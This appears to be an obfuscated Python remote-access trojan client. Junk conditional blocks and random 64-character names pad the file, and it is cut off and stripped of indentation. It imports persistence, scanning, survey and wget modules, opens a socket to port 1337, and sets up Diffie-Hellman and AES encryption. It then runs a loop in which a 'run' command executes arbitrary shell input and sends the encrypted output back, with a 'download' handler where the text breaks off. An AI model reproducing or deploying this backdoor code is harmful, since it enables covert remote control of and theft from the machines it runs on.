for gTXiTKkJvNbQUQLFhjXToAExbdyvoNjamcLSZwROkgmCAdQdLJJuPdOhZuiKzPwo in RGhCdsOOVGTFHBMclmriaolrdxONEyDpufesZpORMoaxPRRQLNLouogtMHzGLHhK:
BKhQMAyIjxUahKPTvUxJaeOpXcjElKCCxOSwewtDoeupIJkQPYxKEsAbWIHmJICL = gTXiTKkJvNbQUQLFhjXToAExbdyvoNjamcLSZwROkgmCAdQdLJJuPdOhZuiKzPwo
from core.crypto import AES_decrypt, AES_encrypt, diffiehellman
GmvWYChatdyViSZvhphpvvUxkPjpkXBhwCJpaSuLTIGbZgwOhcAEgsPHxQHDVsiV = 'SBJnMxByNUzJDBJsRJFSJGjrlKtVQyfElKIDzcgqeaBkZMAqJLVBjImECMQDVdaI'
sDlBNuaqucESNgzlUaVsloeLuQnTMfoQFVVKBYItrvWMxcoMMhuBAJecniqmRwxt = 'ndiZPQbGkAaDgnJcPFouMLxgcJBQwFTxwsjscrgaAKAyzxFtFZjallIVmthswFST'
nYIwywIviRjxKcSJAuJTagAoWBQgeecPBoQaxDrKTiGUaNvfveVHdtsZcMSOMqMP = 'gBqvSMxmoUkfCUoQXmrWPqgGguxAbVYJSOJfXvYfLzwHcUMSCIFjOhhEKEeVpBIW'
if GmvWYChatdyViSZvhphpvvUxkPjpkXBhwCJpaSuLTIGbZgwOhcAEgsPHxQHDVsiV == sDlBNuaqucESNgzlUaVsloeLuQnTMfoQFVVKBYItrvWMxcoMMhuBAJecniqmRwxt:
nYIwywIviRjxKcSJAuJTagAoWBQgeecPBoQaxDrKTiGUaNvfveVHdtsZcMSOMqMP = 'gBqvSMxmoUkfCUoQXmrWPqgGguxAbVYJSOJfXvYfLzwHcUMSCIFjOhhEKEeVpBIW'
nYIwywIviRjxKcSJAuJTagAoWBQgeecPBoQaxDrKTiGUaNvfveVHdtsZcMSOMqMP = GmvWYChatdyViSZvhphpvvUxkPjpkXBhwCJpaSuLTIGbZgwOhcAEgsPHxQHDVsiV
else:
nYIwywIviRjxKcSJAuJTagAoWBQgeecPBoQaxDrKTiGUaNvfveVHdtsZcMSOMqMP = 'gBqvSMxmoUkfCUoQXmrWPqgGguxAbVYJSOJfXvYfLzwHcUMSCIFjOhhEKEeVpBIW'
nYIwywIviRjxKcSJAuJTagAoWBQgeecPBoQaxDrKTiGUaNvfveVHdtsZcMSOMqMP = 'SBJnMxByNUzJDBJsRJFSJGjrlKtVQyfElKIDzcgqeaBkZMAqJLVBjImECMQDVdaI'
from core.filesock import recvfile, sendfile
cpAkyfEymffhGkPlzujoklVGOQdPoMwrWwDYCQtEiYXdwnxKWFDSvPQQCkbCOqRJ = 'TaLmwvYfsXVQwsxGjTWwYKPAHZaPPubQDFuBYJvLBVwAbFFVCRpBZCYvZZATCtbh'
WzBhKvMfuovwkMUFFtXRkDuSsOFbalkURSnclIyTSXxAkxDtOAATHhcWVFTCGRAi = 'hMnNhaUYhzelYYOjXXPmBePEkZPnjrlqwbliiDjNGZefiLgFfoZeQtEbRPShJnOo'
if cpAkyfEymffhGkPlzujoklVGOQdPoMwrWwDYCQtEiYXdwnxKWFDSvPQQCkbCOqRJ != WzBhKvMfuovwkMUFFtXRkDuSsOFbalkURSnclIyTSXxAkxDtOAATHhcWVFTCGRAi:
cpAkyfEymffhGkPlzujoklVGOQdPoMwrWwDYCQtEiYXdwnxKWFDSvPQQCkbCOqRJ = 'hMnNhaUYhzelYYOjXXPmBePEkZPnjrlqwbliiDjNGZefiLgFfoZeQtEbRPShJnOo'
WzBhKvMfuovwkMUFFtXRkDuSsOFbalkURSnclIyTSXxAkxDtOAATHhcWVFTCGRAi = cpAkyfEymffhGkPlzujoklVGOQdPoMwrWwDYCQtEiYXdwnxKWFDSvPQQCkbCOqRJ
cpAkyfEymffhGkPlzujoklVGOQdPoMwrWwDYCQtEiYXdwnxKWFDSvPQQCkbCOqRJ = 'TaLmwvYfsXVQwsxGjTWwYKPAHZaPPubQDFuBYJvLBVwAbFFVCRpBZCYvZZATCtbh'
from core.persistence import run
WuPDrhOKblJfEsWCBKwMAUZowkCfoPpxyWHpFkDCDFJMlZIrbQDnrABaRhJwIhNM = 'WITTLkIbXgtuyyPtUDlVIbGVZOIzdVOQKGrZSguadNUSEWpValQmyIUNgwDEwcgt'
from core.scan import single_host
lJOCltYGQYsnQzBWEAkmCtpccTvwfBuAeQRFQxaBFFeAQJrryINiSzkbLZYhLoTw = 'KGhhCPZevQyKaJsHZKatccosNRWeJRUewBjgljMxlDeAGyuQIZMkrcGcwEvrekQY'
from core.survey import run
aaVgpWsJNhcrFnUssuAXMTTdzrucVKekzLmaBghjZrYMnkiaCpuqeWFAAqkiMVKz = 'TFYXgOsjRtRvapmjPRxwveSenwwxBgwCmvfyWDYsFWqoYxXItnWoisdejlzvBpNM'
eVmApFUQsgbPwPhtXPdkXWjEQKjRNDDpWGzgtunguWSDFvSoXwOudskerzYInElR = 'TjYxcyxHATRUjVzokBHuyqqpJsrvnVZxXDZBbCFOmeQGRgqyzOzIpnuVtYiVtPte'
if aaVgpWsJNhcrFnUssuAXMTTdzrucVKekzLmaBghjZrYMnkiaCpuqeWFAAqkiMVKz != eVmApFUQsgbPwPhtXPdkXWjEQKjRNDDpWGzgtunguWSDFvSoXwOudskerzYInElR:
aaVgpWsJNhcrFnUssuAXMTTdzrucVKekzLmaBghjZrYMnkiaCpuqeWFAAqkiMVKz = 'TjYxcyxHATRUjVzokBHuyqqpJsrvnVZxXDZBbCFOmeQGRgqyzOzIpnuVtYiVtPte'
eVmApFUQsgbPwPhtXPdkXWjEQKjRNDDpWGzgtunguWSDFvSoXwOudskerzYInElR = aaVgpWsJNhcrFnUssuAXMTTdzrucVKekzLmaBghjZrYMnkiaCpuqeWFAAqkiMVKz
aaVgpWsJNhcrFnUssuAXMTTdzrucVKekzLmaBghjZrYMnkiaCpuqeWFAAqkiMVKz = 'TFYXgOsjRtRvapmjPRxwveSenwwxBgwCmvfyWDYsFWqoYxXItnWoisdejlzvBpNM'
from core.toolkit import wget, unzip
NOvXayrdFvhPFmFojcwqLpJHqtixGKolgAOsgUqGvMyLnuoMEyzfHKIkfuFMVMPI = 'MhVETBdKWQaRHGolVMMjtCOiBNeHBxNIasRqSPTiznMlHtLbMoTIFVuttHsxsEEO'
PqSaeDPiVsTKYqXVEBLEdlomdGNeqAiPVBfsORFcjNHOfdeaLctWHvuNxjMaQNlo = 'yNczMlhaIOmmyvAfUPdJKEptILgCWRmPTmhRXfePGnDJjtIzVfUgZjSKksqdIoRq'
xvAjlxuzNFenbauYFxaZXEctBCLrOdXFRJMhPAiiwAqvdmnqKLNVotfLhkHhfmIX = 'CjmZixfEWDkoErRJitenwZcfHSpwIxQOhgslYoGuQDWRywEGqHSOyblXrrdxImWD'
KEfcEpZPpoOUjUDRwwvLRQdsRdzhOnfedijBewuCoNPrFliTUWEkkpYETtnhtjap = 'zqUYrAQpMaYjLqudilhBLABYFFxOSGUXwPRAQaHosxPqqDQFcSbzjaApnQTjYMMX'
EzRSbSezGUCGaSpSjVcVWfLYJxYyEJqLOAJrNRbPnPRAlJdgssjucGIebBzTynbJ = 'aDyzjRbcoBIkKwNuFrOftRbPLdzonxmEcBKhyxqAhKFDUnffVVcaydOqkHoeVjgE'
ZnmzgJmZkionRGcSpXTxoOqlzMEUEgJRkndCeepIQBUrMCqbFFVxrWNDpVJioQPq = 'OuTUQzaclBMAEujXdBgHlUpakENcGsjdrQHyrhIDXaiDQckxhQqnMfqEsiSqsVGe'
if NOvXayrdFvhPFmFojcwqLpJHqtixGKolgAOsgUqGvMyLnuoMEyzfHKIkfuFMVMPI != KEfcEpZPpoOUjUDRwwvLRQdsRdzhOnfedijBewuCoNPrFliTUWEkkpYETtnhtjap:
PqSaeDPiVsTKYqXVEBLEdlomdGNeqAiPVBfsORFcjNHOfdeaLctWHvuNxjMaQNlo = xvAjlxuzNFenbauYFxaZXEctBCLrOdXFRJMhPAiiwAqvdmnqKLNVotfLhkHhfmIX
for ZnmzgJmZkionRGcSpXTxoOqlzMEUEgJRkndCeepIQBUrMCqbFFVxrWNDpVJioQPq in KEfcEpZPpoOUjUDRwwvLRQdsRdzhOnfedijBewuCoNPrFliTUWEkkpYETtnhtjap:
if ZnmzgJmZkionRGcSpXTxoOqlzMEUEgJRkndCeepIQBUrMCqbFFVxrWNDpVJioQPq != xvAjlxuzNFenbauYFxaZXEctBCLrOdXFRJMhPAiiwAqvdmnqKLNVotfLhkHhfmIX:
PqSaeDPiVsTKYqXVEBLEdlomdGNeqAiPVBfsORFcjNHOfdeaLctWHvuNxjMaQNlo = PqSaeDPiVsTKYqXVEBLEdlomdGNeqAiPVBfsORFcjNHOfdeaLctWHvuNxjMaQNlo
else:
EzRSbSezGUCGaSpSjVcVWfLYJxYyEJqLOAJrNRbPnPRAlJdgssjucGIebBzTynbJ = NOvXayrdFvhPFmFojcwqLpJHqtixGKolgAOsgUqGvMyLnuoMEyzfHKIkfuFMVMPI
else:
xvAjlxuzNFenbauYFxaZXEctBCLrOdXFRJMhPAiiwAqvdmnqKLNVotfLhkHhfmIX = NOvXayrdFvhPFmFojcwqLpJHqtixGKolgAOsgUqGvMyLnuoMEyzfHKIkfuFMVMPI
NOvXayrdFvhPFmFojcwqLpJHqtixGKolgAOsgUqGvMyLnuoMEyzfHKIkfuFMVMPI = EzRSbSezGUCGaSpSjVcVWfLYJxYyEJqLOAJrNRbPnPRAlJdgssjucGIebBzTynbJ
if xvAjlxuzNFenbauYFxaZXEctBCLrOdXFRJMhPAiiwAqvdmnqKLNVotfLhkHhfmIX == NOvXayrdFvhPFmFojcwqLpJHqtixGKolgAOsgUqGvMyLnuoMEyzfHKIkfuFMVMPI:
for ZnmzgJmZkionRGcSpXTxoOqlzMEUEgJRkndCeepIQBUrMCqbFFVxrWNDpVJioQPq in NOvXayrdFvhPFmFojcwqLpJHqtixGKolgAOsgUqGvMyLnuoMEyzfHKIkfuFMVMPI:
if ZnmzgJmZkionRGcSpXTxoOqlzMEUEgJRkndCeepIQBUrMCqbFFVxrWNDpVJioQPq == xvAjlxuzNFenbauYFxaZXEctBCLrOdXFRJMhPAiiwAqvdmnqKLNVotfLhkHhfmIX:
xvAjlxuzNFenbauYFxaZXEctBCLrOdXFRJMhPAiiwAqvdmnqKLNVotfLhkHhfmIX = NOvXayrdFvhPFmFojcwqLpJHqtixGKolgAOsgUqGvMyLnuoMEyzfHKIkfuFMVMPI
else:
xvAjlxuzNFenbauYFxaZXEctBCLrOdXFRJMhPAiiwAqvdmnqKLNVotfLhkHhfmIX = EzRSbSezGUCGaSpSjVcVWfLYJxYyEJqLOAJrNRbPnPRAlJdgssjucGIebBzTynbJ
except ImportError as ClzWdZTtdhpNhuKbtPJSjiontGEGaUFjHaQuWIvsykjeHsAXAKsqunfRlxRVDmuu:
SubwpTRohzghWzGqjzLqpqIoYhDGrMkoMCkruvzPlMImpBMpEkYPpcPdVRWkNNHm = 'AvXpdukeatIPFFLaTWBAfYATjvrofBhPHpQDIkegzkRNNrsvuaoTYuuBnZbwfINH'
EpYehrJLwnMxSUZUEBuWtmbtwciouoAFZtXBXRUMfwUswGtxsVWTggxWhwpGYuRH = 'twsklWzlsbFzWyHrAJdMCsrJMbUZYXlDjtWnHaxkzPzJkSFGXmQOvbVDlIUGUpNj'
LzfOSehPxUUUyONOqNnrAIYFGszmzPFhhivRYKLXciykLaQPbHuRmpqYkyBuaODv = 'uLMULjWgwYhVWyVMFOoZJvsDAmlIaSPSsWMKKtrLjUtYnktMPpeaTFmQQVGZVpjG'
if SubwpTRohzghWzGqjzLqpqIoYhDGrMkoMCkruvzPlMImpBMpEkYPpcPdVRWkNNHm == EpYehrJLwnMxSUZUEBuWtmbtwciouoAFZtXBXRUMfwUswGtxsVWTggxWhwpGYuRH:
LzfOSehPxUUUyONOqNnrAIYFGszmzPFhhivRYKLXciykLaQPbHuRmpqYkyBuaODv = 'uLMULjWgwYhVWyVMFOoZJvsDAmlIaSPSsWMKKtrLjUtYnktMPpeaTFmQQVGZVpjG'
LzfOSehPxUUUyONOqNnrAIYFGszmzPFhhivRYKLXciykLaQPbHuRmpqYkyBuaODv = SubwpTRohzghWzGqjzLqpqIoYhDGrMkoMCkruvzPlMImpBMpEkYPpcPdVRWkNNHm
else:
LzfOSehPxUUUyONOqNnrAIYFGszmzPFhhivRYKLXciykLaQPbHuRmpqYkyBuaODv = 'uLMULjWgwYhVWyVMFOoZJvsDAmlIaSPSsWMKKtrLjUtYnktMPpeaTFmQQVGZVpjG'
LzfOSehPxUUUyONOqNnrAIYFGszmzPFhhivRYKLXciykLaQPbHuRmpqYkyBuaODv = 'AvXpdukeatIPFFLaTWBAfYATjvrofBhPHpQDIkegzkRNNrsvuaoTYuuBnZbwfINH'
print(ClzWdZTtdhpNhuKbtPJSjiontGEGaUFjHaQuWIvsykjeHsAXAKsqunfRlxRVDmuu)
sys.exit(0)
ifkyjfqMKsCDTTKFljvJpynmzoQOwTIGPtROJfuaHPXOZyRatKVogjTWNRvciIlg = sys.platform
adEmHlQyrOqdXhOUYKdcbsPRLxFvrIOUKLUfWxOjNuqRVZQQsJzaBpLNoJGeIjSL = 'kUQxyIxanqwmYwtGLWuFkHgqQwFeeTcxvnitAOWRbBfmCEygTpkuHdXAcCIKMPDv'
FxTPoySufueEOvxZbhFkTCbjeKHcqzBpqwvDlsDuMvnhEbWEawNKEHYAIaiAQzSv = 'spvshnzqbEQXkOTUeXCYAcYpUhAwNNGEWvUaRBbmoodQDnCJPFtLffukDOgHADbF kUQxyIxanqwmYwtGLWuFkHgqQwFeeTcxvnitAOWRbBfmCEygTpkuHdXAcCIKMPDv'
HxOFAfTWcjPHWEkBdHzuBaijqQKVMcHzcDnSxmAkZKcUeuAkSxulkRnsQRlpoUrD = 'localhost'
suksSWiHpdlEqDHlBRJxVGXVKZhZhjohUiDFhTvuVbEGDBMlHwdBIiGpxwVFlAgP = 1337
sGmIyFXCcjjvihfxOJvwuWAtUFJcLrpvRCunDguQMpNDDmCMZTmLSzPNsPyrEvnj = 'b14ce95fa4c33ac2803782d18341869f'
def seikgwnzTHwHPwktHYrqMmlXUtYiicrqXQdEadtEymMyRPOeOZFlkqYVlcTWhaFe():
gcqneiWdTJTmbHllbjseAaCIdVgDgAcjfXfaDPqlMasViVTZCJYctIwouGFEYqUk = socket.socket()
gcqneiWdTJTmbHllbjseAaCIdVgDgAcjfXfaDPqlMasViVTZCJYctIwouGFEYqUk.connect((HxOFAfTWcjPHWEkBdHzuBaijqQKVMcHzcDnSxmAkZKcUeuAkSxulkRnsQRlpoUrD, suksSWiHpdlEqDHlBRJxVGXVKZhZhjohUiDFhTvuVbEGDBMlHwdBIiGpxwVFlAgP))
wQhPgGEpfaJcHTUwpSREwiCzpxprnWHNawdPXkWCbibJJRGKSxdZcJnuVYcEvpFa = diffiehellman(gcqneiWdTJTmbHllbjseAaCIdVgDgAcjfXfaDPqlMasViVTZCJYctIwouGFEYqUk)
while True:
clIyrotxBHiZdHpnUkapKwlikTkWBQwATKZVavKFRrCfTmFxOVLDzXDKQruTJKJF = 'XzXQnsixkxNgwxQqVGuBImSPBwcFuzpwsPYLXDWzaGGbYxDEHYjHTbKitjJsPMjR'
pHllEWnzwYtFQuzUHjouBhzLZMVKqQGMVxjCjTWlgKVxwaNJSjvqGJgexWJDEOdy = 'CFluTAcuaylOQNrjpNMomISesffLaANmooaveEhwczzoWOKvIAeYkPLqijCgtKZy'
TNeiqPywWVTKiVFOyCreuWGXHthiUgexESVSXmhHxKeMjOYEBmdHfoUhGRIimCnM = 'hCHAVQYQdSwCNZVlxFguXObDHmIFxldJzdHeqoZvXkiHjCKFGXrXtOtyNearDaPA'
mYiRjzKecbeovtavmvezdLjPUIrFOZavSNapkqkHxNGbUyvoVfLKQDmHeTDAUNZt = 'FnkPjtgUoFhEgWcBWCapqOGZIxQuqjZMEpqkgChLcmNVtRIGmjcXLzkfUTcmKVCG'
LHXVrIxHBvXbILbppWlRjyfSgfuXSQlCPAmWgaWmzjZHvqNVVhOfTBZhZeopgirx = 'PuHatkZJZFxoofsJRtfCHKTFPcHDmyomexFHwSxfHRJaXiaXicgzcXwldjEFSeOj'
ZjJfCyYakmBlxPtwNymFZlNTCcbSGOhbNKRZkvmRNzJlZCDoMpXbdZiQdEsyAlcD = 'HEDjyogAKBcvIcDohnAijSQbTCvBzqNfYvykwDoiJgixbDbAVvaHYEDXuFUHOTKu'
if clIyrotxBHiZdHpnUkapKwlikTkWBQwATKZVavKFRrCfTmFxOVLDzXDKQruTJKJF != mYiRjzKecbeovtavmvezdLjPUIrFOZavSNapkqkHxNGbUyvoVfLKQDmHeTDAUNZt:
pHllEWnzwYtFQuzUHjouBhzLZMVKqQGMVxjCjTWlgKVxwaNJSjvqGJgexWJDEOdy = TNeiqPywWVTKiVFOyCreuWGXHthiUgexESVSXmhHxKeMjOYEBmdHfoUhGRIimCnM
for ZjJfCyYakmBlxPtwNymFZlNTCcbSGOhbNKRZkvmRNzJlZCDoMpXbdZiQdEsyAlcD in mYiRjzKecbeovtavmvezdLjPUIrFOZavSNapkqkHxNGbUyvoVfLKQDmHeTDAUNZt:
if ZjJfCyYakmBlxPtwNymFZlNTCcbSGOhbNKRZkvmRNzJlZCDoMpXbdZiQdEsyAlcD != TNeiqPywWVTKiVFOyCreuWGXHthiUgexESVSXmhHxKeMjOYEBmdHfoUhGRIimCnM:
pHllEWnzwYtFQuzUHjouBhzLZMVKqQGMVxjCjTWlgKVxwaNJSjvqGJgexWJDEOdy = pHllEWnzwYtFQuzUHjouBhzLZMVKqQGMVxjCjTWlgKVxwaNJSjvqGJgexWJDEOdy
else:
LHXVrIxHBvXbILbppWlRjyfSgfuXSQlCPAmWgaWmzjZHvqNVVhOfTBZhZeopgirx = clIyrotxBHiZdHpnUkapKwlikTkWBQwATKZVavKFRrCfTmFxOVLDzXDKQruTJKJF
else:
TNeiqPywWVTKiVFOyCreuWGXHthiUgexESVSXmhHxKeMjOYEBmdHfoUhGRIimCnM = clIyrotxBHiZdHpnUkapKwlikTkWBQwATKZVavKFRrCfTmFxOVLDzXDKQruTJKJF
clIyrotxBHiZdHpnUkapKwlikTkWBQwATKZVavKFRrCfTmFxOVLDzXDKQruTJKJF = LHXVrIxHBvXbILbppWlRjyfSgfuXSQlCPAmWgaWmzjZHvqNVVhOfTBZhZeopgirx
if TNeiqPywWVTKiVFOyCreuWGXHthiUgexESVSXmhHxKeMjOYEBmdHfoUhGRIimCnM == clIyrotxBHiZdHpnUkapKwlikTkWBQwATKZVavKFRrCfTmFxOVLDzXDKQruTJKJF:
for ZjJfCyYakmBlxPtwNymFZlNTCcbSGOhbNKRZkvmRNzJlZCDoMpXbdZiQdEsyAlcD in clIyrotxBHiZdHpnUkapKwlikTkWBQwATKZVavKFRrCfTmFxOVLDzXDKQruTJKJF:
if ZjJfCyYakmBlxPtwNymFZlNTCcbSGOhbNKRZkvmRNzJlZCDoMpXbdZiQdEsyAlcD == TNeiqPywWVTKiVFOyCreuWGXHthiUgexESVSXmhHxKeMjOYEBmdHfoUhGRIimCnM:
TNeiqPywWVTKiVFOyCreuWGXHthiUgexESVSXmhHxKeMjOYEBmdHfoUhGRIimCnM = clIyrotxBHiZdHpnUkapKwlikTkWBQwATKZVavKFRrCfTmFxOVLDzXDKQruTJKJF
else:
TNeiqPywWVTKiVFOyCreuWGXHthiUgexESVSXmhHxKeMjOYEBmdHfoUhGRIimCnM = LHXVrIxHBvXbILbppWlRjyfSgfuXSQlCPAmWgaWmzjZHvqNVVhOfTBZhZeopgirx
FXRrWAzIHjxZcHYYdcbgaXeaFjAhmzOyaeEJgxiIuyrxhwdbmbSjXjCIeOVCdbGm = gcqneiWdTJTmbHllbjseAaCIdVgDgAcjfXfaDPqlMasViVTZCJYctIwouGFEYqUk.recv(1024)
FXRrWAzIHjxZcHYYdcbgaXeaFjAhmzOyaeEJgxiIuyrxhwdbmbSjXjCIeOVCdbGm = AES_decrypt(FXRrWAzIHjxZcHYYdcbgaXeaFjAhmzOyaeEJgxiIuyrxhwdbmbSjXjCIeOVCdbGm, wQhPgGEpfaJcHTUwpSREwiCzpxprnWHNawdPXkWCbibJJRGKSxdZcJnuVYcEvpFa)
DZMoUboPmwXCritJnDzYFKfmWMbOOqfXOzVxOcwVEVcsRxPYVCWClKNeuBzdMaJu, _, gjydbwjOJAzCLnUbmdOxDXJdNCxvhMPgRpoErUpfUlgooWLdjzXISOyoGcWhAtwX = FXRrWAzIHjxZcHYYdcbgaXeaFjAhmzOyaeEJgxiIuyrxhwdbmbSjXjCIeOVCdbGm.partition(' ')
if DZMoUboPmwXCritJnDzYFKfmWMbOOqfXOzVxOcwVEVcsRxPYVCWClKNeuBzdMaJu == 'quit':
HpGnavopgOVDDhjgCJDpsOdZgnJzcmgcBNFcUtIjgAjimXUjuqGZpQBgNasxZSaF = 'VxdoZnhVzziTdiWbbzWXfMLpoAAhMtRxrpwLdEOusNVBFpHogRffDbtFaOJzJQTU'
vfLzoLjTVGckdMsYgBFKSgeqJGloOKIHQfDWjBCjcQDNzNnJyqLOqeYYMYaWxPAw = 'tHplzNRdefucUjtISKlaGRwUWrxNKmWilaRPNjDXAvYRLJvNdEFksMYgWnVtdavW'
vxSDrrZKbJetSBGounvbwctexnmKVxVCiwJSvRPpPpSJIAFZZFsBjXOVzGCPzQCB = 'GbLeyBLfmJzYiQYGVSqpUwMvZMRoZriKpYJwrPngjLWOvZQlvmMIoVpGWavfWexu'
MYYNJyYkUuKJJuJjyJFeyyKYTKklDcgheWKTfAJJuDXmpHEjfHBwMAChtwMxRYQT = 'SzsoVlVrNOoLFTehvpZMpJArWBJKtAoDvCDezkSYGZTUnqJCLfpMDPioVgbIRDqZ'
jkjYMyLEpIJcIPGtmCcvOPxWlslFLmFPBlzNZNZexsaSNPUXXEpkzIINJDPWASDD = 'EkXEWUCxXyvbjGMYUrEGAqapbkZdsCbXkBKvnlsmHPLmkjJUaYxJTvmMtTEjOFAz'
lvxyVYtEpYJrAcyCmSYuVGsMLPmOFZZKfzzHNZVSIhlZzcaRAYsZIbSvqUGueLxF = 'HNgVMceHWAZrWCTNxEjWYISmKawFVPYPBNxTOOuzSNcnbuOYqYSegKYSUIzpUjwv'
if HpGnavopgOVDDhjgCJDpsOdZgnJzcmgcBNFcUtIjgAjimXUjuqGZpQBgNasxZSaF != MYYNJyYkUuKJJuJjyJFeyyKYTKklDcgheWKTfAJJuDXmpHEjfHBwMAChtwMxRYQT:
vfLzoLjTVGckdMsYgBFKSgeqJGloOKIHQfDWjBCjcQDNzNnJyqLOqeYYMYaWxPAw = vxSDrrZKbJetSBGounvbwctexnmKVxVCiwJSvRPpPpSJIAFZZFsBjXOVzGCPzQCB
for lvxyVYtEpYJrAcyCmSYuVGsMLPmOFZZKfzzHNZVSIhlZzcaRAYsZIbSvqUGueLxF in MYYNJyYkUuKJJuJjyJFeyyKYTKklDcgheWKTfAJJuDXmpHEjfHBwMAChtwMxRYQT:
if lvxyVYtEpYJrAcyCmSYuVGsMLPmOFZZKfzzHNZVSIhlZzcaRAYsZIbSvqUGueLxF != vxSDrrZKbJetSBGounvbwctexnmKVxVCiwJSvRPpPpSJIAFZZFsBjXOVzGCPzQCB:
vfLzoLjTVGckdMsYgBFKSgeqJGloOKIHQfDWjBCjcQDNzNnJyqLOqeYYMYaWxPAw = vfLzoLjTVGckdMsYgBFKSgeqJGloOKIHQfDWjBCjcQDNzNnJyqLOqeYYMYaWxPAw
else:
jkjYMyLEpIJcIPGtmCcvOPxWlslFLmFPBlzNZNZexsaSNPUXXEpkzIINJDPWASDD = HpGnavopgOVDDhjgCJDpsOdZgnJzcmgcBNFcUtIjgAjimXUjuqGZpQBgNasxZSaF
else:
vxSDrrZKbJetSBGounvbwctexnmKVxVCiwJSvRPpPpSJIAFZZFsBjXOVzGCPzQCB = HpGnavopgOVDDhjgCJDpsOdZgnJzcmgcBNFcUtIjgAjimXUjuqGZpQBgNasxZSaF
HpGnavopgOVDDhjgCJDpsOdZgnJzcmgcBNFcUtIjgAjimXUjuqGZpQBgNasxZSaF = jkjYMyLEpIJcIPGtmCcvOPxWlslFLmFPBlzNZNZexsaSNPUXXEpkzIINJDPWASDD
if vxSDrrZKbJetSBGounvbwctexnmKVxVCiwJSvRPpPpSJIAFZZFsBjXOVzGCPzQCB == HpGnavopgOVDDhjgCJDpsOdZgnJzcmgcBNFcUtIjgAjimXUjuqGZpQBgNasxZSaF:
for lvxyVYtEpYJrAcyCmSYuVGsMLPmOFZZKfzzHNZVSIhlZzcaRAYsZIbSvqUGueLxF in HpGnavopgOVDDhjgCJDpsOdZgnJzcmgcBNFcUtIjgAjimXUjuqGZpQBgNasxZSaF:
if lvxyVYtEpYJrAcyCmSYuVGsMLPmOFZZKfzzHNZVSIhlZzcaRAYsZIbSvqUGueLxF == vxSDrrZKbJetSBGounvbwctexnmKVxVCiwJSvRPpPpSJIAFZZFsBjXOVzGCPzQCB:
vxSDrrZKbJetSBGounvbwctexnmKVxVCiwJSvRPpPpSJIAFZZFsBjXOVzGCPzQCB = HpGnavopgOVDDhjgCJDpsOdZgnJzcmgcBNFcUtIjgAjimXUjuqGZpQBgNasxZSaF
else:
vxSDrrZKbJetSBGounvbwctexnmKVxVCiwJSvRPpPpSJIAFZZFsBjXOVzGCPzQCB = jkjYMyLEpIJcIPGtmCcvOPxWlslFLmFPBlzNZNZexsaSNPUXXEpkzIINJDPWASDD
gcqneiWdTJTmbHllbjseAaCIdVgDgAcjfXfaDPqlMasViVTZCJYctIwouGFEYqUk.close()
sys.exit(0)
elif DZMoUboPmwXCritJnDzYFKfmWMbOOqfXOzVxOcwVEVcsRxPYVCWClKNeuBzdMaJu == 'run':
YFjLPlYoiRlrvKiMwwMFGXMyRbquKDXKbsMwWqFWKykctficTrBHxYpcKbyUHkDm = 'YvBKYUVhdugDZFWydpafzUyusaNcXHjzhbQSGIDKMeYVsGeDqDKFSsffFPgBnkUx'
ULColqsuyNEAkuDMAldDtXAWZEtwaRmjakspwUeHufQDicEgoUFrYuCIokrAfAvz = 'nkXMKRwCeUgxRNxXxOClxMHuzkkIzlmmNVPkKHhWwkQUouZnuDFspmqBuCXSgbzF'
RISltHawfHazeNmoqeoqGIvqyGQxowflGhgKhkVIrYSkiKWWgEItARnvhMhmOPXz = 'ObwVQlXqRdJKVBLHIFdxbETcibmDxLWjhIdNOQcSWFxyUlTEkeHHXxWKeXRJsjnx'
if YFjLPlYoiRlrvKiMwwMFGXMyRbquKDXKbsMwWqFWKykctficTrBHxYpcKbyUHkDm == ULColqsuyNEAkuDMAldDtXAWZEtwaRmjakspwUeHufQDicEgoUFrYuCIokrAfAvz:
RISltHawfHazeNmoqeoqGIvqyGQxowflGhgKhkVIrYSkiKWWgEItARnvhMhmOPXz = 'ObwVQlXqRdJKVBLHIFdxbETcibmDxLWjhIdNOQcSWFxyUlTEkeHHXxWKeXRJsjnx'
RISltHawfHazeNmoqeoqGIvqyGQxowflGhgKhkVIrYSkiKWWgEItARnvhMhmOPXz = YFjLPlYoiRlrvKiMwwMFGXMyRbquKDXKbsMwWqFWKykctficTrBHxYpcKbyUHkDm
else:
RISltHawfHazeNmoqeoqGIvqyGQxowflGhgKhkVIrYSkiKWWgEItARnvhMhmOPXz = 'ObwVQlXqRdJKVBLHIFdxbETcibmDxLWjhIdNOQcSWFxyUlTEkeHHXxWKeXRJsjnx'
RISltHawfHazeNmoqeoqGIvqyGQxowflGhgKhkVIrYSkiKWWgEItARnvhMhmOPXz = 'YvBKYUVhdugDZFWydpafzUyusaNcXHjzhbQSGIDKMeYVsGeDqDKFSsffFPgBnkUx'
PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak = subprocess.Popen(gjydbwjOJAzCLnUbmdOxDXJdNCxvhMPgRpoErUpfUlgooWLdjzXISOyoGcWhAtwX, shell=True,
BRafQBZPSCscRMQzhfVVAkvFpYSISLyXWGOhodmFdIJFcLmzrbbidhUSBgtiOsbB=subprocess.PIPE, stderr=subprocess.PIPE,
VOEpsaAlxnhWLkrVxOolXHylXZXiQBBlfcbKsrpSHXgdTSBkqVMvCiCnHHGvchLJ=subprocess.PIPE)
PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak = PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak.BRafQBZPSCscRMQzhfVVAkvFpYSISLyXWGOhodmFdIJFcLmzrbbidhUSBgtiOsbB.read() + PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak.stderr.read()
gcqneiWdTJTmbHllbjseAaCIdVgDgAcjfXfaDPqlMasViVTZCJYctIwouGFEYqUk.sendall(AES_encrypt(PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak, wQhPgGEpfaJcHTUwpSREwiCzpxprnWHNawdPXkWCbibJJRGKSxdZcJnuVYcEvpFa))
elif DZMoUboPmwXCritJnDzYFKfmWMbOOqfXOzVxOcwVEVcsRxPYVCWClKNeuBzdMaJu == 'download':
UwKQJQMKYXUlwFuznaNcYycfIzowKZkvLzoRjErFvRMUMhFKYDivdZGsAcMwZcPw = 'sjIjWMrbZgddxLWDwPqVzHyJrgyvPefjIaGfyHHSSspagsvXmnMCHLtPWtXiXmQs'
